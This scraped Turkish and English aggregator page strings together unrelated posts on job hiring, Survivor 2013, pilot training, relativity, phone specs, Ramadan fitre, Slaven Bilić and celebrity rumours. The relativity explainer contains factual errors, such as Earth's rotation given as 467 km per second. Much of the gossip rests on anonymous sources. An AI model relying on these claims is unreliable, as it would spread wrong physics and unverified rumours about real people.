Kasım Ayı Memur Alımları 8.234 Kadro

Kasım Ayı Memur Alım Kılavuzu 8.243 Kadro Branş Sayıları, Çalışma ve Sosyal Güvenlik Bakanı Faruk Çelik Kasım Ayı içerisinde 8243 memur alımı.

Merak Ettiniz Mi? Dünyada Kaçıncı Kişiniz?

Bilmem hiç merak edeniniz oldu mu? Ben doğduğumda dünyadaki kaçıncı kişi idim.Ya da benden önce kaç kişi dünyaya geldi. Bir başka soru ise ortalama kaç yaşında öleceğim?

En Güncel Memur Maaşları

Tüm Kamu Kurum ve Kuruluşlarının 2012 Memur Maaşları ve İmkanları

Türkiye ve Dünya Haritası 3 Boyutlu

Tam Ekran / Google Map Haritası, Türkiye ilçe Haritaları ve Cadde Sokak sorgulama imkânı, Mesafe - Alan ölçümü, Yol Tarifi, Rakım ve koordinat belirleme ve Dünyanın tüm ülkelerinin 3 Boyutlu Görüntülerine Hayran Olacaksınız

SEO Yarışması

Telemarketingürünleritürkiyesatışlideritvshopsanalmağazacılık kelimesinde Googlede ilk sırada çıkan kişi yarışmayı kazanacak

ÖSYM 2012 Sınav Takvimini Açıkladı

ÖSYM’nin açıkaldığı sınav takviminde 28 sınav yer alıyor. ÖSYM tarafından yapılan açıklamaya göre sınav takviminin güncel gelişmelere göre değişebileceği

Ehliyet Sınav Soruları ve Cevapları

22011 yılının 5. ve son ehliyet sınavı 10 Aralık 2011 Cumartesi günü yapılacak. Motorlu Taşıtlar Sürücü Adayı Sınavı

Sümela' nın Şifresi İzle

Filmde, “halk kahramanı” Temel, az bilinen bir sır olan Sümela’nın sırrını çözmeye çalışacak.İşte Detaylar

2011-2012 Eğitim Yılında Burs Veren Kurumlar

2011-2012'de üniversite öğrencilerine burs verecek kurumlar. 2011-2012 Burs başvuruları. 2011-2012 Özel burslar ve iletişim.

Window 7, XP'nin Gerisinde Kaldı

Windows 7'nin satışa sunulmasının ardından geçen 18 ayda Microsoft, 350 milyon adet lisanslı Windows 7 satmayı başardı.

Survivor 2013 Şampiyonu Hilmi Cem Oldu Survivor Ünlüler Gönüllüler Yarışmasını Hilmicem Kazandı

Survivor Ünlüler Gönüllüler Yarışması Şampiyonu Hilmicem Oldu
2013 Survivor şampiyonu Hilmi Cem oldu. Survivor Ünlüler Gönüllüler Yarışması'nda finale kalan  Hilmicem ve Doğukan Manço arasında SMS oylaması yapıldı. 
Halkın kullandığı SMS oylaması sonucu 2013 yılının Survivor şampiyonu Hilmicem oldu.
 
Survivor’da final heyecanlı dakikalara sahne oldu. Bo reklamlı programın sonunda Hilmicem yüzde 69’la birinciliği kazanırken Doğukan yüzde 31’de kaldı.

Hilmicem şampiyon olan ilk Gönüllü olma özelliğini de almış oldu.
 
Survivor Ünlüler Gönüllüler yarışmasının gönüllü yarışmacılarından Hilmi Cem kısa özgeçmişi, yaşı, işi, biyografisi ve resimleri.
Hilmi Cem Yetenek Sizsiniz Türkiye 2012 yarışmacısıdır. Yarışmada değişik danslarıyla yarışan dansçı Hilmi Cem, yarı finalde All Star Team grubuyla birlikte yarışmış ancak akrobasi ve dans performansıyla finale çıkmayı başaramamıştı. Hilmi Cem yakışıklı görüntüsü, kaslı ve fit vücuduyla jüri üyesi Hülya Avşar'ın dikkatini çekmiş ve onun hayranlığını kazanmıştı.
 
 
19 Mayıs Muğla Yenice doğumlu olan Hilmi Cem İntepe 18 yaşına kadar Bodrum Güvercinlik’te yaşadı. 15 yaşında kendi kendine dans etmeye başlayan Hilmi Cem hiçbir yardım almadan her şeyi kendi öğrendi.



17 yaşında latin danslarına yazılan Hilmi Cem İntepe birçok kez salsada Türkiye Gençler Şampiyonu olmuştur. Üniversitedeki 2. yılında Muğla’dan yakın arkadaşları ile birlikte bir dans okul açan Hilmi Cem İntepe şu anda faal olarak açtığı bu okulda dans eğitmenliğine devam etmektedir.



Hilmi Cem İntepe, bu sezon Yetenek Sizsiniz Türkiye yarışmasına da katılmıştır. Yarışma da 1. turda 3 evet aldı bir üst tura çıktı, 2. tur da %79 oy aldı yarı finale çıktı ve yarı finalde ise %72 oy aldı ama elendi. 
Survivor Hilmi Cem İntepe Kimdir Biyografisi ve Resimleri 

Uçak Pilotu Olmak İçin Hangi Bölüm Okumak Lazım, Nasıl Pilot Olunur ?

Pilot nasıl olunur, pilot olmak için hangi bölüm okumak lazım, uçak pilotu nasıl olurum, pilot olmak
Hemen hemen herkesin uçak pilotu olma hayali vardır küçüklükte bu hayal neden kaynaklanır diye soracak olursanız kimse bunun cevabını bilemez, ancak sanırım hiç bilinmeyen görülmeyen sadece havada uçan kocaman bir uçağın içinde olduğu söylenen hayali bir şey’dir çocuklar için pilot.

Tam top oynarken büyük bir gürültü gelir ve uçak geçtiğini görür çocuk, işte tam o anda duyguları hareket eder, hayali kahramanını canlandırır. Belki de kuşlar gibi özgür istediği yere gittiğini sanar, kimse bilemez, uçak pilotu olmak hemen hemen tüm çocukların hayalinde olan bir gerçektir.

Pilot nasıl olunur ?
-Lise mezunu olmak
-Liseden sonra üniversite sınavına girmek ve bir bölümden en az 250 ham puan almak,
-Pilotluk bölümü olan üniversitelere başvuruda bulunmak
-Başvurunun onaylanması için bazı şartlar var işte o
Bu şartlar şu şekilde:
1- Türkiye Cumhuriyeti vatandaşı olmak
2- Herhangi bir yükseköğretim kurumu, askeri okuldan disiplinsizlik nedeniyle ceza almamak.
3- İşitme kaybı, peltelik vb. vücut kusurlarına sahip olmamak. Boy-kilo olarak istenilen şartlara uymak.
4- Sivil havacılık eğitimlerinde başarısız olmama, disiplinsizlikten ceza almamak.
Bu şartları taşıyorsanız ön kayıt için başvuruda bulunabilirsiniz.
Ön kayıt başvurusunda bulunmak için;
son üniversite sınavından alınan puan sonuçları,
nüfus cüzdanı örneği,
dört adet vesikalık,
başvuru formu ve sınav evrak giderleri için uygun görülün bir miktar para.
Ön kayıttan sonra mülakatlara katılmak için önce sağlık raporu almalısınız. Sağlık raporu ile ilgili bilgileri gireceğiniz okuldan alabilirsiniz. Ardından sözlü ve fiziki mülakatlardan geçmeniz yeterlidir. Eğer mülakatları da geçtiyseniz başvurduğunuz kurumun yapacağı sınav veya sınavlara katılıp geçer not almanız size pilot olmak için ilk adımı atmanızı sağlayacaktır.

Are wedding bells ringing for Raymond Lam and Karena Ng?

Raymond Lam and Karena Ng
According to the Hong Kong media, Raymond Lam and Karena Ng are currently in the midst of wedding preparations, less than a year after their high-profile relationship came to light.

It was reported that Raymond’s father, a devout Buddhist, has secretly flown to Hong Kong to visit the Karmapa (head of the Karma Kagyu, a school of Tibetan Buddhism), whom he hopes will witness the wedding.

Raymond’s dad and sister were also believed to be holding their discussions with the actor at his mansion after they were spotted in the vicinity last Thursday.

Despite earlier reports claiming that Mr. Lam has been unhappy with Karena’s spending habits, he is said to have accepted his future daughter-in-law because of his son, and even intends to throw a hundred-table banquet in their hometown Xiamen.

Both Raymond and Karen have denied the marriage rumours, while the actress reiterated her wish to focus on her career at the moment.

İZAFİYET TEORİSİ

İZAFİYET TEORİSİ

İzafiyet Teorisi, diğer bir adıyla Görelilik Teorisi’dir. Bu teori, bilimin yeni bir çağa atlamasını sağlayan  Albert  Einstein tarafından 1905 yılında oluşturulmuştur. Görelilik denmesinin sebebi ise eş zamanlılığın (bir olayın iki ya da daha fazla kişi için aynı anda vuku bulması) değişken olduğunu açıklamasıdır. Yani evrenin her noktasında zaman aynı hızda akmaz, zaman bağımsız bir sabit değildir. Zaman mekana ve harekete bağımlı değişkendir.
Zaman denilince akla ilk saat gelir, ölçüm gelir. Zaman aslında bir boyuttur. Zaman boyutunu biz insanlar hafızamız sayesinde fark ederiz. Örnek verecek olursak; bir durakta bekleyelim ve yoldan geçen arabaları sayalım. Birinci araba geçsin, gitsin. Biz de ona bakış atalım. Bir dakika sonra ikinci araba geçsin. İki araba arasında bir süre geçtiğini düşünürüz. Halbuki, ikinci arabayı gördüğümüz anda birincisi zihnimizde sadece bir hayalden ibarettir, bir bilgidir. Biz var olduğumuz anla bu bilgileri kıyaslayarak zaman boyutunun farkına varmış oluruz. Aslında zamanın ölçülebilme eylemi yapılan bu kıyastan ileri gelir. Bu kıyas olmasaydı zaman diye bir şey olmayacaktı..
Özel Görelilik
Einstein’ın meşhur  E=m.c²  formülü bu kuramı oluşturur. Formüldeki  E=enerji, m=kütle, c=ışık hızıdır. Kurama göre zaman, kütle ve cismin hareket doğrultusundaki boyu o cismin hızına bağlıdır. Kuramın temel aldığı en önemli kabullenim ışık hızının evrendeki en büyük hız olduğudur. Işık hızı boşlukta 300.000 km/sn  hızla yayılmasıyla sıradan bir doğa olayı olmasından öte uzay ile zamanı bir araya getiren olgudur.
Işığın Sabitliği İlkesi
Lise yıllarında çözdüğümüz hız problemlerini hatırlayalım. Bağıl hız konusunda “Nehre göre, yüzücüye göre, arabaya göre hız” diyerek testler çözmüştük. Şimdi konumuzu daha anlaşılır kılmak için bağıl hızları kullanacağız.
Vapurdaki bir çocuk topu havaya atıyor. Topun hareketi, çocuk için sadece yukarı düşey atıştan ibaret. Kıyıdaki adam ise vapurun hızıyla giden ve yükselen bir top görüyor. Vapura ters yöndeki bir uçaktaki yolcu, yükselen, vapur hızına uçak hızı eklenmiş bir hızda giden top görüyor. Hatta dünya dışından kartal gözüyle bakan bir gözlemci, saniyede 467 km hızla dönen dünyanın hızını da vapura eklemek zorunda kalacak. Şimdi sorumuzu soralım; topun gerçek hızı nedir?
Topun gerçek hızı diye bir şey asla olamaz çünkü evrende sabit bir referans noktası yoktur. Evrendeki tek sabit hız, ışık hızıdır. O hangi varlık hangi hızda olursa olsun ayrım yapmaz.Oherkese göre 300.000km/sn hızla gider. Şimdi ışık hızını katalım olaya.
Çocuk topu saniyede 270.000km hızla fırlatsın. Top, ışık ışınını yanından 30.000km\sn (300.000-270.000) hızla geçiyormuş gibi görmeliydi. Işığın sabitlik özelliğinden dolayı ışık yine aynı hızla geçiyor. Hatta çocuk direkt topu ışık hızıyla atsın. Top, ışığı duruyor gibi görmeliydi ama ışık yine kaçıyor, yine kaçıyor. Burada ışık hala kaçıyorsa bunu tek bir şey açıklığa kavuşturuyor. Aslında top ışığa yetişemiyor çünkü topa göre zaman yavaş akıyor.
Bu anlattığımız olay, ikiz paradoksuyla da açıklanabilir. İkizlerden biri roket ile 10 yıllık uzay seyahatine çıkarılır. 10 yıl sonra dünyadaki kardeş seyahatten gelen kardeşinden daha yaşlı olacaktır çünkü seyahatteki kardeş evrende sürekli hızlı hareket halindedir.
Kütle Artışı ve Kısalma
Özel görelilik kuramının öngörülerinden diğeri de, ışık hızına yaklaşan cismin kütlesinde bir artış meydana gelmesidir. Bunun sebebi ise hızlanan cisimde meydana gelen kinetik enerjinin bir kısmı  muazzam hız sayesinde yoğunlaşarak kütleye evrilir. Buradan yola çıkarak kütleyi enerjinin yoğunlaşmış hali olarak ifade edebiliriz.
Kuramın diğer ön görüsü, ışık hızına yaklaşan cismin hareket doğrultusunda kısalmasıdır.
Özel görelilik kuramı birçok deneyle ispatlanmıştır. Örneğin; daha önceki aylarda bahsettiğim parçacık hızlandırıcısı deneylerinde, elektronlar ışık hızına yakın hızlara getirilmeye çalışılmıştır fakat hız arttıkça kütle de arttığı için parçacıkların ivmelendirilmesi zorlaşmıştır. Bu yüzden “Hiçbir madde ışık hızına ulaşamaz” denir.
Oldukça hızlı giden uçaklara hassas atom saatleri yerleştirilip deneyler yapılmış, saatlerin kurama uygun bir şekilde yavaşlayıp hızlandığı görülmüştür.
Genel Görelilik
Genel görelilik kuramında ise kütle çekiminin zamana etkisi sorununa çözüm getirilir. Özel görelilik kuralları doğrultusunda ışığın hızı sabittir fakat ışık bükülebilirdir. Işık, kütle çekiminden etkilenerek bükülür. Dünya’nın kütlesi için bu bükülme çok azdır fakat yapılan deneylerle Güneş’in etrafındaki yıldızlardan gelen ışığı, derecenin 2000 de biri kadar bükebildiği görülmüştür. Peki, bu bükülme nasıl meydana gelir?
Kütle Çekiminin Altındaki Gizli Gerçek
Uzayın bir çarşaf gibi gerilmiş olduğunu düşünelim ve bu çarşafın üzerine iki adet misket koyalım. Misketler, çarşafı bükerek birbirlerine yaklaşırlar. Aslında birbirlerine yaklaşmalarının sebebi birbirlerine kuvvet uygulamaları değildir. Çarşafı bükmeleri onları birbirlerine yaklaştırmıştır. İşte uzay-zamandaki herhangi iki gök cismi de bu şekilde uzay-zamanını bükerek birbirlerine yakınlaşır. Hatta bunlar, birbirlerini bükerken beraberinde yatay doğrultuda giden ışığı da bükmektedirler. Böylece yerçekiminin bir kuvvet olmadığı ortaya çıkar. Newton’un, kuvveti esas alan kütle çekim kuramı da geçerliliğini yitirmiş olur. Yerine Einstein’ın kütleyi esas alan kütle çekim kuramı gelir.
Kütle Çekiminde Zamanın Göreliliği
Yatay doğrultuda giden ışığın etrafındaki kütleler tarafından büküldüğünden bahsetmiştik. Peki, ışık düşey doğrultuda cisimden ayrılmak isterse ne olur? Bu soru için büyük kütleli ışık saçan Güneş’i ele alalım.
Işık ışınları, düşey doğrultuda (Güneş merkezine dik) Güneş’ten ayrılır. Işık ışınları, mesafe kat ettikçe enerjileri azalır. Frekansları düşer ve dalga boyları artar. Dalga boyu arttıkça prizmada renk kızıla yaklaşırdı. Böylece ışıkta “kütlesel kızıla kayma” meydana gelir.
Işığın, bir cisimden uzaklaştıkça frekansının azaldığını gördük. Bu cisim, bu sefer Dünya olsun ve Dünya’da 100 katlı bir apartman dairesine gidelim. Dünya’dan yansıyan ışınlar için frekans, apartmanın birinci katında 2 Hertz iken, yüzüncü katında 1 Hertz olsun. Yani bir saniyede alt katta 2 dalga tepesi sayarken, 100. katta bir dalga tepesi saymış olmamız gerekirdi. Ancak daha önce de belirtmiştik; ışık hızı her katta sabitti. O yüzden 100. katta da 2 tepe saymak lazım. Böylece 100. katta, alt kata göre zaman daha çabuk akmalı ki, orda da 2 tepe sayabilelim. İkiz paradoksunu kütle çekimine uyarlayacak olursak; yüksek yerde yaşayan ikizin, deniz seviyesinde yaşayan kardeşinden daha çabuk yaşlanacağı sonucu çıkar. Tabii bu hesap Dünya’da farkedilmeyecek kadar önemsizdir.
Genel görelilik, aynı zamanda gökcisimlerinin hareketlerinin neden eliptik olduğunu açıklar. Evrende oldukça fazla gökcismi var ve bunların her biri, üzerlerinde bulundukları uzay-zamanını bükerek birbirlerini çekiyor. Böylece en yakın yolları aslında bir doğru değil de bir eğri oluyor.
NASA, bu kuram için 600 milyon dolarlık bütçe ayırdı ve NASA'nın yetkililerinden Erricos Pavlis, Einstein'ın; Dünya gibi büyük cisimlerin kendi eksenleri etrafında dönerken uzay ve zamanı büktüğünü söylediğini, kendilerinin de bundan yola çıkarak araştırma yaptıklarını belirtti. En nihayetinde, Dünya’nın bir yılda dönüş yönünde 2metrelik sapma gerçekleştirdiği tespit edildi.

MERYEM UZERLİ'NİN YENİ DİZİSİ - MERYEM UZERLİ VE KIVANÇ TATLITUĞ AYNI DİZİDE OLACAK




Bu yıla damgasını vuran isim MERYEM UZERLİ (Hürrem Sultan) oldu. Meryem Uzerli Muhteşem Yüzyıl adlı dizide adından oldukça söz ettirdi ve başarılı bir oyunculuk ile sevilen oyunculardan birisi oldu. Ancak aniden rahatsızlandığı için apar topar diziyi bırakarak yurt dışına giden güzel oyuncu hakkında bir sürü yazılar yazıldı.

Tekrar Türkiye'ye dönmeyecek denilen Meryem Uzerli için yeni ve Bomba gibi bir haber yayınlandı.

Kuzey Güney'in final yapması ile birlikte yeni proje teklifleri alan Kıvanç Tatlıtuğ'a Ay Yapımdan gelen teklif  Meryem Uzerli ile beraber bir dizde rol alacaklar.

Kıvanç Tatlıtuğ'un Cemre (Öykü Karayel) ile aynı dizide beraber oynayacakları haberlerinden sonra yenisi ise Meryem Uzerli oldu.

CANLI İZLEMEK İÇİN TIKLAYIN..Youtube Dizi İzle,Youtubediziizle,Dizi İzle,Dizi Fragmanı İzle,Dizi Seyret,Full Dizi İzle,HD,Youtube Fragman İzle,Youtube Dizi Tek Parça İzle,Youtube Tek Parça İzle,Yotube Full İzle,Youtube Dizi İzle,Youtubedizi,Dizi İzle,Dizi Fragmanı İzle,Fragmanı İzle Youtube,Dizi Seyret,Full Dizi İzle,HD Dizi İzle,Youtube Yemek Programları İzle,Yemek Programları,Tv Yemek Programları,Yemek Tarifleri,Resimli,Yemek Programları İzle,Yemek Programları,Televizyon Yemek Programları İzle,Yemek Programları Canlı İzle,Full İzle,Online Dizinin Konusu

Meryem Uzerli ve Kıvanç Tatlıtuğ'un başrollerinde olacağı dizinin konusu bir azeri erkekle, ermeni bir genç kızın aşklarını konu alacak olan dizi Eylül ayında Kanal D ekranlarında olacak.

Dizinin Adı ve Yayın tarihi henüz belli değil.
Dizi ile ilğili bilgileri sitemizden öğrenebilirsiniz.

YENİ HTC BUTTERFLY S - HTC BUTTERFLY S İLE GELİYOR - HTC BUTTERFLY S ÖZELLİKLERİ

güncel,htc one,htc one butterfly s,htc one butterfly s,htc butterfly s ne zaman çıkacak,htc yeni butterfly s,butterfly s nedir,butterfly s kaç para olacak,yeni htc ne zaman çıkacak,htc yeni telefonunu çıkarıyor,htc den yeni buuterfly s geliyor,htc one yenisi olan butterfly skaç para olacak
HTC Yeni Modeli HTC BUTTERFLY S İle Geliyor...
Samsung'un S2, S3, ve S4 gibi tek model üzerinde geliştirerek ürettiği model serisini sürdürme akımına, HTC de katıldı, HTC kısa bir süre önce çıkardığı ve çok tutulan yeni telefon HTC ONE kısa sürede istenilen yere geldi ve en çok tercih edilen telefon oldu. HTC buna alışmadan HTC ONE serisinin yenisi olan HTC BUTTERFLY S ile yeniden gündemde.
İşte HTC BUTTERFLY S ile ilgili yazımız.
Geçtiğimiz yıl tanıtılan dünyanın ilk Full HD ekranlı telefonu olan fakat başarısız pazarlama ve tanıtımdan dolayı dünya çapında bu unvanı SonyXperia Z’ ye kaptıran HTC, uzunca bir aradan sonra çıkarttığı One modeli ile Full HD ekranlı telefonlar kategorisinde ekran kalitesi ile en önde yer almayı başarmıştı. Pazara tek başına bir tek telefon modeli ile kullanıcılara hitap etmenin çok zor olduğunu rakibi Samsung’ tan öğrenen HTC, uzak doğuda büyük başarı elde eden Butterfly modelini güncelleyip tekrar pazara sunarak bu büyük pastadan daha fazla pay almak istiyor.

Yeni telefonda Butterfly ismini devam ettiren HTC,sadece sonuna S takısı getirerek telefonun daha güçlü olduğunun altını çizmeye çalışıyor. HTC yeni telefonunda One modelinde olduğu gibi Snapdragon 600 işlemcisini kullanacak; fakat bu işlemci Galaxy S4’ ün Amerika LTE versiyonunda kullanıldığı gibi 1,9 Ghz de çalışacak. 2 GB Ram zaten üst düzey telefonlarda artık standartlaştı ve bu telefonda da 2 GB ram kullanılacak. HTC’ nin üst düzey telefonlarında kullanılmayan bir özellik olan harici Mikro SD kart bu telefonda kullanılabilecek. Arka kapağın çıkartılıp çıkartılmayacağı ve pilin değiştirilebileceği hakkında bir bilgi yok. Butterfly S’ te, One da kullanılan birçok yazılımsal özellikte olacak. Telefonun önünde yer alan 2 adet hoparlör ile BoomSound özelliğini bu telefonda da kullanan HTC, Ultra Piksel kamera ile birlikte HTC Zoe’ ya da yer vererek. Blinkfeed arayüzünü de Butterfly S’ e koyarak görselliği arttıran HTC, bir önceki modeldeki en önemli eleştiriyi göz önünde bulundurarak pil kapasitesini 1850 mah’ tan 3200 mah güce yükseltmiş.

Kısacası yeni Butterfly S global pazarda satılırsa 5 inç pazarında olmayan HTC’ yi diğer rakipleri ile aynı hatta tasarım anlamında daha da ileriye taşıyacak gibi görünüyor.

Dada Chan tries to play a wife


DaDa Chan Jing worked on a campaign for a slimming beauty company for the third year. This year she will not release any photo book. She admitted that photo book did not make as much money as acting. Earlier she won the Hong Kong Film Award Best Supporting Actress with VULGARIA (DAI JOOK HEI KET)'s "Popping Candy", but some felt that she did not rely on acting. They gave her pressure because her character stood out; she hoped to transition from playing sexy to relying on acting and receive recognition for it. However, she just guest starred in Pang Ho Cheung's new film and she still had to be sexy. The character was similar to "Popping Candy". "He said that it wasn't before, I was fooled. However it had some touching spots for balance." She would not mind being sexy if the role had potential. She revealed that later she will play a wife for the first time and she suggested for the film company to find a Korean hunk to play her husband.

Fala Chen and Daniel Sit on the verge of breaking up

Rumours are rife that Fala Chen and her Neway heir partner, Daniel Sit's relationship is currently on a rocky path.

As reported on HK Channel, the issue started when Daniel's father impeded his plan to invest in Fala's new venture, an artiste management and recruitment company.

Sources claimed, "Daniel's father now favours his younger brother, Ernie since his wife, Maria Zhuge is pregnant. He doesn't want Daniel wasting money for Fala's business."

Sources alleged that Daniel's decision to not invest in Fala's company resulted in a quarrel between the two and that Fala had headed to United States to further her studies without the company of her partner.

The actress further fuelled the squabble when she updated her Weibo and posted, "I choose to remain silent because I do not want to lie. This is the last I could do for you and me".

Despite that, Fala denied that it meant anything, saying that it was just a lyric from a song.

Matthew Morrison Engaged To Renee Puente

Congratulations! ‘Glee’ star Matthew Morrison and his gorgeous girlfriend of two years are engaged.

Matthew Morrison’s happy news was announced on stage at the White Tie and Tiara Ball in London on June 27. His good friends Elton John and David Furnish revealed that Matthew is engaged to Renee Puente!


Matthew Morrison Engaged To Renee Puente — Mr. Schuester’s Getting Hitched

In honor of the happy engagement news, Elton and Coldplay frontman Chris Mthumbnailartin sang a duet of "Your Song” and dedicated it to the 34-year-old Glee actor and his fiancee.
“They are thrilled. It is the first marriage for them both. He loves her so much. The theme of the night was love, which is so appropriate,” a source close to the star told E! News.

Renee Puente Shows Off Her Huge Engagement Ring

Matthew arrived at the event in a tailored suit and bow tie, while his new fiancée wore a gorgeous navy blue embroidered gown, along with a huge diamond on her ring finger!
The engaged duo stepped out for the first time as a couple, two years ago, at this very same event, Just Jared reports.
Matthew, who will return to the set of Glee very soon, in order to start filming season five, is currently promoting his new album Where It All Began in England.
We’re so happy for the couple and their very exciting news! What do YOU think, HollywoodLifers?
Subscribe to me on YouTube

2013 Fitre Ne Kadar? Ramazan Fitresi Ne Kadar?

Diyanet.gov.tr sayfasında duguruan 2013 ramazan fitresi ne kadar olarak belirlendi? kimlere fitre verilir? Her yıl olduğu gibi yüce dinimiz İslam'da bir sene içerisindeni en bereketli Ramazan ayı ümmeti selamlamaya hazırlandı. Ekonomik durumu iyi olan her müminin ödemekle yükümlü olduğu Fitre bedeli diyanet işleri başkanlığı tarafından belirlendi.

Geçtiğimiz sene 8.5 tl olarak belirlenen Bu yılki Ramazan fitresi kişi başı ne kadar
ödenecek
olan sadaka bedeli de 2013  Ramazan fitresi 9 lira 25 kuruş olarak belirlenmiştir. Ramazan ayı fitresi ne kadar? bir gelişme ve değişiklik olduğu taktirde yazımıza eklenecektir.
Fitre Sadaka nedir? Ramazan fitresi; temel ihtiyaçlarını karşılayabilen ve bunun dışında belli değerde
mala sahip tüm Müslümanların çevrelerindeki fakirlerin üzerinde bulunan ve ödemeleri gereken sadaka bedelidir. Ödemekle yükümlü olduğunuz Fitreyi Ramazan bayramdan önce ihtiyaç sahiplerine verilmesi makbuldu. Allah, ödeyeceğiniz fitreyi gönlünüzle vermenizi ve gerçek ihtiyaç sahiplerine ulaştırmayı nasip etsin.

Linda Chung a Violent Inspector, No Longer a BB






Joe Ma returns to TVB for new series Tiger Cubs 2. Yesterday the press conference was held, the cast including Joe, Linda Chung, Oscar Leung, Him Law, Mandy Wong, Christine Kuo, Benjamin Yuen, Timmy Hung and Grace Wong attended. TVB also pushed out a birthday cake to celebrate his 45th birthday.

Joe said: "I'm happy to be back at TVB. I have a 2 year per-series contract with them. I'll shoot one series per year. I wonder if there will be Tiger Cubs 3? But its difficult to have a breakthrough in my role this time. I feel a little pressured." As for the female lead, Linda Chung replaced Jessica Hsuan. Linda plays a hot-tempered and violent CIB inspector. She showed the fake scars she had on her two arms, and joked: "I'm no longer a BB!"

Linda was asked about the rumor that her record company favored her more and made the other singers leave? She helplessly said: "Actually my boss cares about all his artists. I'm not a favored one. I've been with the company for 4 years before I get my own mini concert. The rumor has been a slight impact on me, covering up my hard work."

It was reported Christine has been madly letting out her "electricity" on Oscar Leung. Oscar joked after Christine "electrified" him, their relationship went a thousand miles. In the sequel, the two are a married couple, Oscar hoped there will be a bed scene. He said: "I can reveal my chest muscles and let Christine cuddle on my chest. We can sit on the bed and watch TV together. My nipples are pretty good looking." Christine looked like she had gained some weight, it was rumored she injected 'catgut' to lose weight? She said: "I don't know what catgut is. I am seeing a Chinese doctor now."

Source: Mingpao, Oriental Daily (images)

Khloe Kardashian's Romantic Birthday Present From Lamar Odom

It’s the simple things in life that matter, right? Khloe Kardashian seems to agree because a source tells HollywoodLife.com EXCLUSIVELY that she’s ‘happy’ with the ‘smaller,’ ‘significant things’ Lamar gifts her with, especially on her birthday.

Khloe Kardashian is “happy, refreshed” and has a lot “to be thankful for” on her 29th birthday today, June 27, a source tells HollywoodLife.com exclusively. It also doesn’t hurt that her husband, Lamar Odom, is showering her with lots of love today — in many ways!thumbnail

Lamar Odom: Khloe Kardashian’s Birthday Present — So Romantic

“Lamar personally picked out flowers for her. He hand-picked them, but had them wrapped with all the bells and whistles and delivered. Khloe’s a simple girl, much more easy going and more low-key than her sisters. She’s appreciative of the smaller things, the significant things, Lamar does for her. I’m sure there’s more gifts and a ‘special’ gift he’ll give her later — one only he can give her. She’ll love it,” a source close to the couple tells HollywoodLife.com exclusively.
Sounds exciting! Based on past episodes of Khloe & Lamar, we know that the happy couple likes to get a little wild in the bedroom. Good for them!

Khloe Kardashian: Staying Away From North West On Birthday

Khloe is likely staying away from sister Kim Kardashian, Kanye West and their newborn baby North West on her birthday. Today’s her day, and she’s doing her own thing.
“She’s seen the baby. She loves her new niece, but I think today she’s going to do something else,” the source adds.
What do YOU think, HollywoodLifers? Are you a fan of Lamar’s gifts to Khloe?

Watch: Kanye West Supports Kim Kardashian Keeping Baby Weight 


Subscribe to me on YouTube

Slaven Bilic Kimdir, Kariyeri, Hangi Takımları Çalıştırdı, Yaşı, Nereli

Slaven Bilic 11 Eylül 1968, Split - Yugoslavya da doğdu. Avukat, müzisyen, Teknik direktör ve Stoper mevinde forma giymiş eski Hırvatistan Milli futbolcusudur.


Teknik Direktörlüğe 2001-2002 sezonunda futbola başladığı ve jubilesini de yaptığı takım olan Hajduk Split’te İlk hocalık deneyimine imzasını atan 34 yaşındaki Slaven Bilic, Arsene Wenger ve Marcello Lippi’yi de bu dönemde ziyaret ederek, iki ünlü hocanın deneyimlerinden yararlanmıştı

Daha sonra 2004-2006 senelerinde Hırvatistan U-21 Takımının Antrenörlüğünü yapmıştır. U-21 dönemi, onu A Takım’a hazırladı.

2006-2012 seneleri arasında Hırvatistan Milli takımını çalıştırdı. 2006 FIFA Dünya Kupasından sonra kovulan Zlatko Krancjar'ın yerine 2006 yılında ise Hırvatistan A Milli Takımı’nın hocası oldu. Takımı Euro 2008’e soktu. Burada çeyrek finalde Türkiye’ye uzatmaya giden maçta penaltılarda elendi. Yine de takımı bırakmadı.

2010 FIFA Dünya Kupası’na Hırvatistan gidemedi ama, O takımın başında kaldı. Euro 2012’de Euro 2008 ile 2010 FIFA Dünya Kupası şampiyonu İspanya’ya karşı Hırvatistan’ı 'fazla ofansif' oynatmakla eleştirildi.

Euro 2012’de takımı Play-Off’a soktu. Euro 2008'de Avrupa Futbol Şampiyonası çeyrek finalinde Türkiye'ye kaybettikleri maçın ardından, 2012 Avrupa Futbol Şampiyonası elemeleri play-off turunda (A) Milli Takım ile finallere katılmak için Türkiye ile karşılaştı.

Baraj karşılaşmasında Slaven Bilic yönetimindeki Hırvatlar, deplasmanda Türkiye'yi 3-0 yendiler, evlerinde de 0-0 berabere kalarak kupanın yolunu tuttular. Ancak finallerde İspanya, İtalya ve İrlanda’nın yer aldığı grupta 3. olarak elendiler. Kendisine birçok teklif gelen Slaven Bilic, kulüp takımı çalıştırmaya karar verdi. Bu sırada Beşiktaş dahil İngiltere’den ve Rusya’dan teklifler aldı.

2012 Avrupa Futbol Şampiyonası sonrasında Lokomotiv Moskova'nın başına geçti. Lokomotiv Moskova Alınan kötü sonuçların ardından istifası istendi ama kulübün kadın başkanı Olga Smorodskaya, onun yanında oldu. Ancak takım sezonu 43 puanla 9. sırada bitirince, 18 Haziran 2013 tarihinde takımı ile karşılıkla olarak yollar ayrılmıştır.

2013-14 sezon öncesinden Beşiktaş ile 2+1 yıllık anlaşma imzalamıştır. Beşiktaş'dan KAP'a gönderilen açıklamada Slaven Bilic'in Beşiktaş Futbol Takımının teknik direktörlüğü görevine getirildiği bildirildi. Beşiktaş'ın Kamuyu Aydınlatma Platformu'na gönderilen açıklama da;
“Slaven Bilic ile Profesyonel Futbol Takımımızın Teknik Direktörlüğü konusunda anlaşmaya varılmıştır. Kendisine;
- 2013-2014 sezonu için 1.500.000 Avro
- 2014-2015 sezonu için 1.600.000 Avro
- 2015-2016 sezonu için 1.700.000 Avro ödeme yapılacaktır." dendi.

Justin Bieber'in Yeni Sevgilisi Jordan Ozuna Fotoğrafları

ordan Ozuna fotoğrafları, Jordan Ozuna resimleri, justin bieber ve Jordan Ozuna , justin bieber sevgilisi, justin bieber yeni sevgilisi, justin bieber,n sevgilisi kim, justin bieber jordon ozuna resimleri, justin bieber jordon ozuna pictures, justin bieber jordon ozuna photos




Justin Bieber'in yeni Sevgilisi Kim?

Selena Gomez ile birlikteliği bir bitip bir başlayan Justin Bieber'in adı şimdi başka birisi ile anılıyor...

Justin Bieber'in Jordan Ozuna isimli bir kız ile ilişkisi olduğu iddia edildi...

Jordan Ozuna garsonluk yapıyormuş..

İşte Jordan Ozuna Resimleri...

Justin Biber Jordan Ozuna Fotoğrafları...





Fala Chen Indirectly Admits Break Up with "Neway Prince", Rumored Split Assets



